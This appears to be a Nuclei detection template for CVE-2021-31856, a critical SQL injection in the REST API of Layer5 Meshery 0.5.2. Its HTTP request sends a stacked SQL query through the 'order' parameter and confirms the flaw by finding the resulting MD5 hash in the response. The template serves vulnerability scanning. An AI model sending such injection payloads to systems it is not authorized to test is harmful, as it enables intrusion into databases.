45 lines
1.2 KiB
YAML
45 lines
1.2 KiB
YAML
id: CVE-2021-31856
|
|
|
|
info:
|
|
name: Layer5 Meshery 0.5.2 - SQL Injection
|
|
author: princechaddha
|
|
severity: critical
|
|
description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
|
|
reference:
|
|
- https://github.com/ssst0n3/CVE-2021-31856
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-31856
|
|
- https://meshery.io
|
|
- https://github.com/layer5io/meshery/pull/2745
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-31856
|
|
cwe-id: CWE-89
|
|
cpe: cpe:2.3:a:layer5:meshery:*:*:*:*:*:*:*:*
|
|
epss-score: 0.07416
|
|
tags: sqli,cve,cve2021
|
|
metadata:
|
|
max-request: 1
|
|
|
|
variables:
|
|
num: "999999999"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: word
|
|
words:
|
|
- '{{md5({{num}})}}'
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/05/17
|